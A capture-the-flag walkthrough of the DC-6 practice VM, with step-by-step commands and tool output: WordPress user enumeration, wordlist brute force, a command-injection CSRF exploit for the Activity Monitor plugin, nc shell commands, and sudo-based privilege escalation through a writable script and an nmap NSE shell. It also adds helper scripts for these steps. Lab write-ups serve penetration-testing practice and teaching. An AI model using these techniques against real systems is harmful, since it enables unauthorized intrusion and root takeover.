Attacking the DC-6 target VM

    Tech | 2022-08-05

    DC-6

    1. Host discovery

    2. Port scanning

    Full TCP port range with service and OS detection (-A -p-), normal output saved to a file:

    C:\Users\ASUS>Nmap 192.168.43.182 -A -p- -oN nmap.A
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-05 10:16 China Standard Time
    Nmap scan report for dc-6 (192.168.43.182)
    Host is up (0.00022s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
    | ssh-hostkey:
    |   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
    |   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
    |_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
    80/tcp open  http    Apache httpd 2.4.25 ((Debian))
    |_http-server-header: Apache/2.4.25 (Debian)
    |_http-title: Did not follow redirect to http://wordy/
    MAC Address: 00:0C:29:83:F6:0C (VMware)
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.22 ms dc-6 (192.168.43.182)

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 32.66 seconds

    3. Visiting the web page

    The hostname wordy (the redirect target shown in the nmap output) does not resolve, so add an entry mapping 192.168.43.182 to wordy in the local hosts file (/etc/hosts on Kali, C:\Windows\System32\drivers\etc\hosts on Windows).

    The site turns out to be running WordPress.
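The three facts the scan hands us (target address, open services, and the virtual host the web server redirects to) are easy to miss in a long -oN file. As an added example, not part of the original writeup, the script below pulls them out of an nmap normal-output file and prints the hosts-file line that step 3 needs. The sample input is the relevant part of the scan above, saved to a temporary file; the function names are my own.

```shell
# Added example (not part of the original writeup): extract the target address,
# the open services and the redirect hostname from an "nmap -oN" file, then
# print the hosts-file line that step 3 needs. Function names are my own.

# Sample input: the relevant lines of the scan above, copied into a temp file.
NMAP_SAMPLE=$(mktemp)
cat > "$NMAP_SAMPLE" <<'EOF'
Nmap scan report for dc-6 (192.168.43.182)
Host is up (0.00022s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
EOF

# target_ip FILE: the scanned address, whether or not nmap resolved a hostname.
target_ip() {
    sed -n -e 's/^Nmap scan report for .*(\([0-9.]*\)).*/\1/p' \
           -e 's/^Nmap scan report for \([0-9.]*\)$/\1/p' "$1" | head -n1
}

# open_ports FILE: "port proto service version" for every open port line.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
        split($1, p, "/"); v = ""
        for (i = 4; i <= NF; i++) v = v (i > 4 ? " " : "") $i
        print p[1], p[2], $3, v
    }' "$1"
}

# redirect_host FILE: the virtual host named in nmap's "Did not follow redirect"
# note. nmap reports it but does not resolve it; without a hosts entry the
# browser never reaches the site.
redirect_host() {
    sed -n 's#.*Did not follow redirect to https\{0,1\}://\([^/: ]*\).*#\1#p' "$1" | head -n1
}

# hosts_line FILE: the line to append to /etc/hosts (or the Windows hosts file).
hosts_line() {
    ip=$(target_ip "$1"); h=$(redirect_host "$1")
    [ -n "$ip" ] && [ -n "$h" ] && printf '%s %s\n' "$ip" "$h"
}

echo "target: $(target_ip "$NMAP_SAMPLE")"
open_ports "$NMAP_SAMPLE"
echo "append to /etc/hosts: $(hosts_line "$NMAP_SAMPLE")"
```

Run it against the real nmap.A file instead of the sample and the last line is exactly what to append to the hosts file; the temp file is left behind for inspection.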

    4. Website information gathering

    Install wpscan

    the WordPress vulnerability scanner

    sudo apt-get install wpscan -y
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    The following packages were automatically installed and are no longer required:
      ettercap-common ettercap-graphical figlet finger libapache2-mod-php libluajit-5.1-2 libluajit-5.1-common libnet-snmp-perl
      libnumber-bytes-human-perl libsybdb5 medusa nginx python3-aiohttp python3-aioredis python3-apscheduler python3-async-timeout
      python3-git python3-gitdb python3-hiredis python3-multidict python3-pefile python3-pyexploitdb python3-pyfiglet python3-pymssql
      python3-pyshodan python3-qrcode python3-quamash python3-redis python3-smmap python3-tld python3-yarl python3-yaswfp
      ruby-did-you-mean ruby2.5-doc rwho rwhod toilet-fonts wapiti
    Use 'sudo apt autoremove' to remove them.
    The following additional packages will be installed:
      ruby-cms-scanner ruby-ethon ruby-get-process-mem ruby-nokogiri ruby-opt-parse-validator ruby-pkg-config ruby-typhoeus ruby-yajl
    The following NEW packages will be installed:
      ruby-cms-scanner ruby-ethon ruby-get-process-mem ruby-nokogiri ruby-opt-parse-validator ruby-pkg-config ruby-typhoeus ruby-yajl wpscan
    0 upgraded, 9 newly installed, 0 to remove and 1376 not upgraded.
    Need to get 350 kB of archives.
    After this operation, 1,676 kB of additional disk space will be used.
    Get:1 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-get-process-mem all 0.2.5-1 [6,432 B]
    Get:2 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-pkg-config all 1.4.4-1 [9,276 B]
    Get:3 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-nokogiri amd64 1.10.9+dfsg-1 [116 kB]
    Get:4 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-opt-parse-validator all 1.9.2-0kali1 [12.9 kB]
    Get:5 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-ethon all 0.9.0-2 [33.6 kB]
    Get:6 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-typhoeus all 1.4.0-1 [36.2 kB]
    Get:7 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-yajl amd64 1.3.1-2 [43.1 kB]
    Get:8 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-cms-scanner all 0.12.1-0kali1 [33.7 kB]
    Get:9 http://mirrors.neusoft.edu.cn/kali kali-rolling/non-free amd64 wpscan all 3.8.7-0kali1 [58.9 kB]
    Fetched 350 kB in 5s (75.6 kB/s)
    Selecting previously unselected package ruby-get-process-mem.
    (Reading database ... 310860 files and directories currently installed.)
    Preparing to unpack .../0-ruby-get-process-mem_0.2.5-1_all.deb ...
    Unpacking ruby-get-process-mem (0.2.5-1) ...
    Selecting previously unselected package ruby-pkg-config.
    Preparing to unpack .../1-ruby-pkg-config_1.4.4-1_all.deb ...
    Unpacking ruby-pkg-config (1.4.4-1) ...
    Selecting previously unselected package ruby-nokogiri.
    Preparing to unpack .../2-ruby-nokogiri_1.10.9+dfsg-1_amd64.deb ...
    Unpacking ruby-nokogiri (1.10.9+dfsg-1) ...
    Selecting previously unselected package ruby-opt-parse-validator.
    Preparing to unpack .../3-ruby-opt-parse-validator_1.9.2-0kali1_all.deb ...
    Unpacking ruby-opt-parse-validator (1.9.2-0kali1) ...
    Selecting previously unselected package ruby-ethon.
    Preparing to unpack .../4-ruby-ethon_0.9.0-2_all.deb ...
    Unpacking ruby-ethon (0.9.0-2) ...
    Selecting previously unselected package ruby-typhoeus.
    Preparing to unpack .../5-ruby-typhoeus_1.4.0-1_all.deb ...
    Unpacking ruby-typhoeus (1.4.0-1) ...
    Selecting previously unselected package ruby-yajl.
    Preparing to unpack .../6-ruby-yajl_1.3.1-2_amd64.deb ...
    Unpacking ruby-yajl (1.3.1-2) ...
    Selecting previously unselected package ruby-cms-scanner.
    Preparing to unpack .../7-ruby-cms-scanner_0.12.1-0kali1_all.deb ...
    Unpacking ruby-cms-scanner (0.12.1-0kali1) ...
    Selecting previously unselected package wpscan.
    Preparing to unpack .../8-wpscan_3.8.7-0kali1_all.deb ...
    Unpacking wpscan (3.8.7-0kali1) ...
    Setting up ruby-opt-parse-validator (1.9.2-0kali1) ...
    Setting up ruby-get-process-mem (0.2.5-1) ...
    Setting up ruby-pkg-config (1.4.4-1) ...
    Setting up ruby-ethon (0.9.0-2) ...
    Setting up ruby-yajl (1.3.1-2) ...
    Setting up ruby-nokogiri (1.10.9+dfsg-1) ...
    Setting up ruby-typhoeus (1.4.0-1) ...
    Setting up ruby-cms-scanner (0.12.1-0kali1) ...
    Setting up wpscan (3.8.7-0kali1) ...
    Processing triggers for man-db (2.9.0-2) ...
    Processing triggers for kali-menu (2020.1.7) ...

    Scan the site

    Commonly used options:
      --enumerate u    enumerate users
      --enumerate p    enumerate installed (popular) plugins
      --enumerate vp   enumerate plugins with known vulnerabilities
      --enumerate t    enumerate themes
      --enumerate vt   enumerate themes with known vulnerabilities
      --enumerate tt   enumerate Timthumb scripts
    The vp and vt checks need a WPVulnDB API token (--api-token); without one wpscan still fingerprints versions but prints no vulnerability data, which is what the "No WPVulnDB API Token given" line in the output below means.

    Enumerate all users of the site:

    wpscan --url http://wordy/ --enumerate u

    kali@ToolsScannerKali20201:~$ wpscan --url http://wordy/ --enumerate u
    _______________________________________________________________
             __          _______   _____
             \ \        / /  __ \ / ____|
              \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
               \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
                \  /\  /  | |     ____) | (__| (_| | | | |
                 \/  \/   |_|    |_____/ \___|\__,_|_| |_|

             WordPress Security Scanner by the WPScan Team
                             Version 3.8.7
           Sponsored by Automattic - https://automattic.com/
           @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    _______________________________________________________________

    [+] URL: http://wordy/ [192.168.43.182]
    [+] Started: Sun Oct  4 22:54:53 2020

    Interesting Finding(s):

    [+] Headers
     | Interesting Entry: Server: Apache/2.4.25 (Debian)
     | Found By: Headers (Passive Detection)
     | Confidence: 100%

    [+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
     | References:
     |  - http://codex.wordpress.org/XML-RPC_Pingback_API
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
     |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

    [+] WordPress readme found: http://wordy/readme.html
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%

    [+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 60%
     | References:
     |  - https://www.iplocation.net/defend-wordpress-from-ddos
     |  - https://github.com/wpscanteam/wpscan/issues/1299

    [+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
     | Found By: Rss Generator (Passive Detection)
     |  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
     |  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

    [+] WordPress theme in use: twentyseventeen
     | Location: http://wordy/wp-content/themes/twentyseventeen/
     | Last Updated: 2020-08-11T00:00:00.000Z
     | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
     | [!] The version is out of date, the latest version is 2.4
     | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
     | Style Name: Twenty Seventeen
     | Style URI: https://wordpress.org/themes/twentyseventeen/
     | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
     | Author: the WordPress team
     | Author URI: https://wordpress.org/
     |
     | Found By: Css Style In Homepage (Passive Detection)
     |
     | Version: 2.1 (80% confidence)
     | Found By: Style (Passive Detection)
     |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

    [+] Enumerating Users (via Passive and Aggressive Methods)
     Brute Forcing Author IDs - Time: 00:00:00 <================> (10 / 10) 100.00% Time: 00:00:00

    [i] User(s) Identified:

    [+] admin
     | Found By: Rss Generator (Passive Detection)
     | Confirmed By:
     |  Wp Json Api (Aggressive Detection)
     |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
     |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
     |  Login Error Messages (Aggressive Detection)

    [+] jens
     | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
     | Confirmed By: Login Error Messages (Aggressive Detection)

    [+] graham
     | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
     | Confirmed By: Login Error Messages (Aggressive Detection)

    [+] mark
     | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
     | Confirmed By: Login Error Messages (Aggressive Detection)

    [+] sarah
     | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
     | Confirmed By: Login Error Messages (Aggressive Detection)

    [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
    [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

    [+] Finished: Sun Oct  4 22:54:55 2020
    [+] Requests Done: 17
    [+] Cached Requests: 49
    [+] Data Sent: 3.98 KB
    [+] Data Received: 23.788 KB
    [+] Memory used: 177.148 MB
    [+] Elapsed time: 00:00:01

    Users identified: admin, jens, graham, mark, sarah

    5. Brute-forcing user passwords

    Copy the password wordlist (on Kali it ships compressed as rockyou.txt.gz; gunzip it first if only the .gz is present):

    cp /usr/share/wordlists/rockyou.txt ~/Desktop/

    Create the user list, one username per line (admin, jens, graham, mark, sarah):

    vim dc6user.txt

    Filter the wordlist using the hint (the DC-6 description's clue is to grep rockyou.txt for k01), which cuts the list from millions of entries to a few thousand:

    grep k01 rockyou.txt > dcppassword.txt

    Brute-force the login with wpscan, feeding it the user list and the filtered password list.

    Credentials found: mark / helpdesk01
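The writeup does not show the brute-force command itself. As an added example (mine, not the author's), the script below builds the two lists from the enumeration result and the hint, and prints the wpscan invocation that consumes them. It assumes Kali's wordlist path, the target at http://wordy/ and the hint string k01; the seven-line stand-in for rockyou.txt in demo is constructed so the script runs offline.

```shell
# Added example (not the original author's commands): build the user list and
# the filtered password list for step 5, then print the wpscan brute-force
# command the writeup leaves out. Assumptions: Kali wordlist path, target at
# http://wordy/, hint string "k01" from the DC-6 description.

# Usernames as reported by "wpscan --enumerate u" above.
USERS="admin jens graham mark sarah"

# write_users OUT: one username per line (the file the writeup edits with vim).
write_users() {
    for u in $USERS; do echo "$u"; done > "$1"
}

# rockyou_path: Kali ships the list compressed; unpack it once if needed.
rockyou_path() {
    if [ -f /usr/share/wordlists/rockyou.txt ]; then
        echo /usr/share/wordlists/rockyou.txt
    elif [ -f /usr/share/wordlists/rockyou.txt.gz ]; then
        sudo gunzip -k /usr/share/wordlists/rockyou.txt.gz && echo /usr/share/wordlists/rockyou.txt
    fi
}

# filter_passwords SRC HINT OUT: keep only candidates containing HINT and print
# how many survived. Fixed-string grep, so a hint with regex characters is safe.
filter_passwords() {
    grep -F -- "$2" "$1" > "$3" || :   # grep exits 1 on zero matches; that is not an error here
    wc -l < "$3" | tr -d ' '
}

# wpscan_cmd USERS PASSES: the command to run (printed, not executed here).
# Add --password-attack xmlrpc to go through the xmlrpc.php endpoint the scan
# flagged instead of wp-login.php; without it wpscan picks for itself.
wpscan_cmd() {
    printf 'wpscan --url http://wordy/ -U %s -P %s\n' "$1" "$2"
}

demo() {
    tmp=$(mktemp -d)
    # Constructed stand-in for rockyou.txt; the real file has about 14 million lines.
    printf '%s\n' 123456 password helpdesk01 iloveyou pink01 rock01 k01 > "$tmp/rockyou.txt"
    write_users "$tmp/dc6user.txt"
    n=$(filter_passwords "$tmp/rockyou.txt" k01 "$tmp/dc6pass.txt")
    echo "$n candidate passwords:"; cat "$tmp/dc6pass.txt"
    wpscan_cmd "$tmp/dc6user.txt" "$tmp/dc6pass.txt"
    rm -rf "$tmp"
}
demo
```

Against the real rockyou.txt, swap the constructed file for "$(rockyou_path)" and run the printed command; the author's result (mark / helpdesk01) is one of the surviving candidates.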

    Log in to the wordy admin panel:

    http://wordy/wp-admin/

    The Activity Monitor plugin (Plainview Activity Monitor) is installed.

    With WordPress the way in is usually a plugin rather than core, so the installed plugins are the first thing to check.

    6. Exploitation

    Search for known exploits for the Activity Monitor plugin:

    searchsploit activity monitor

    The hit is Exploit-DB 45274, an authenticated command injection in Plainview Activity Monitor (CVE-2018-15877): the ip field of the plugin's lookup tool is passed to a shell unquoted, and the PoC is a CSRF page that submits it on behalf of a logged-in user. Copy it to the desktop:

    cp /usr/share/exploitdb/exploits/php/webapps/45274.html ~/Desktop/

    Edit the HTML: point the form action at http://wordy/ and replace the injected command (the stock PoC starts a bind shell with nc -nlvp 4444 -e /bin/bash) with a reverse shell back to the Kali host, so that it connects to the listener set up below.

    7. Hosting the HTML page on Kali

    Start the apache2 service:

    sudo systemctl start apache2.service

    Strip the plain-text Exploit-DB header that sits above the <html> tag in 45274.html; otherwise it is served as part of the page.

    Move the file into the web root as the index page:

    sudo mv ~/Desktop/45274.html /var/www/html/index.html

    Reverse shell

    Listen on port 1234 on Kali with nc:

    nc -lvvp 1234

    In the browser session that is logged in to wordy as mark, open the page served by Kali and click the button. The browser submits the form with mark's WordPress session cookie, the plugin runs the injected command as the web server user (www-data), and the shell connects back to the listener.

    8. Privilege escalation

    Upgrade to an interactive shell:

    python -c 'import pty;pty.spawn("/bin/bash")'

    Look around mark's home directory:

    cd /home/mark/stuff
    cat things-to-do.txt

    Credentials in the file: user graham, password GSo7isUM1D4

    Switch to the graham account with su (or log in over SSH, since port 22 is open), check what sudo allows, and look at jens's home directory:

    sudo -l
    cd /home/jens/
    ls -al

    sudo -l shows that graham may run /home/jens/backups.sh as jens without a password, and ls -al shows the script is writable by graham. Anything appended to it runs as jens the next time sudo executes it.

    Append a shell to the script, check it, and run it as jens.

    No password is asked for because the sudoers rule is tagged NOPASSWD. sudo does not care whether the target is root or an ordinary user; it prompts only when the rule requires a password.

    echo /bin/bash >> backups.sh
    cat backups.sh
    sudo -u jens ./backups.sh

    As jens, sudo -l shows that nmap may be run as root.

    Privilege escalation through nmap

    nmap runs NSE scripts, which are Lua, and sudo runs nmap as root, so a one-line script that calls os.execute("/bin/sh") drops a root shell. (Older writeups use nmap --interactive; that mode only exists in nmap 2.02 to 5.21, so on a modern build the --script route is the one that works.)

    echo 'os.execute("/bin/sh")' > getshell
    sudo nmap --script=getshell
    cd /root
    cat theflag.txt

    The shell spawned this way prints no prompt, but everything typed into it runs as root; the same python pty trick as before tidies it up.
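Both escalations on this box come straight out of sudo -l: a script run as another user that the caller can edit, and a binary that can spawn a shell on its own. As an added example (mine, not from the writeup), the script below classifies sudo rules into those categories. The sudo -l text in demo is constructed to resemble the two DC-6 rules and is not a verbatim capture, and the list of shell-capable binaries is a short illustrative subset of what GTFOBins documents.

```shell
# Added example (not from the original writeup): triage "sudo -l" output for
# the two escalation patterns used on DC-6: a script that sudo runs as another
# user but that the current user can edit (backups.sh), and a binary that can
# spawn a shell by itself (nmap --script). Sample text is constructed.

# sudo_targets TEXT: print "runas|nopasswd-or-password|command" per rule line.
sudo_targets() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*\(/ {
            runas = $1; gsub(/[()]/, "", runas)
            tag = ($2 == "NOPASSWD:") ? "nopasswd" : "password"
            for (i = 2; i <= NF; i++)
                if ($i ~ /^\// || $i == "ALL") { print runas "|" tag "|" $i; break }
        }'
}

# classify_target PATH: what the rule is good for.
#   shell-capable   the program can run a shell on its own (GTFOBins-style)
#   writable-script we can change what sudo will execute (-w checks our real
#                   access, so as root almost everything is "writable")
#   all             unrestricted, nothing more to do
#   review          look at the binary by hand
classify_target() {
    path=$1
    [ "$path" = ALL ] && { echo all; return; }
    case "$(basename "$path")" in
        nmap|vim|vi|less|more|find|awk|perl|python*|bash|sh|env|tar|zip) echo shell-capable; return ;;
    esac
    if [ -w "$path" ]; then echo writable-script; else echo review; fi
}

# triage TEXT: one line per rule: class, runas user, password tag, command.
triage() {
    sudo_targets "$1" | while IFS='|' read -r runas tag cmd; do
        printf '%s\t%s\t%s\t%s\n' "$(classify_target "$cmd")" "$runas" "$tag" "$cmd"
    done
}

demo() {
    tmp=$(mktemp -d)
    # Stand-in for /home/jens/backups.sh that we (like graham on DC-6) can write to.
    printf '#!/bin/bash\ntar -czf /tmp/backups.tar.gz /var/www/html\n' > "$tmp/backups.sh"
    chmod 775 "$tmp/backups.sh"
    sample="User graham may run the following commands on dc-6:
    (jens) NOPASSWD: $tmp/backups.sh
    (root) NOPASSWD: /usr/bin/nmap
    (root) /opt/no/such/tool"
    triage "$sample"
    rm -rf "$tmp"
}
demo
```

Feed it the real output with triage "$(sudo -l)": on DC-6 graham's rule comes out as writable-script (append a shell, run it as jens) and jens's rule as shell-capable (the nmap script trick above).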

     
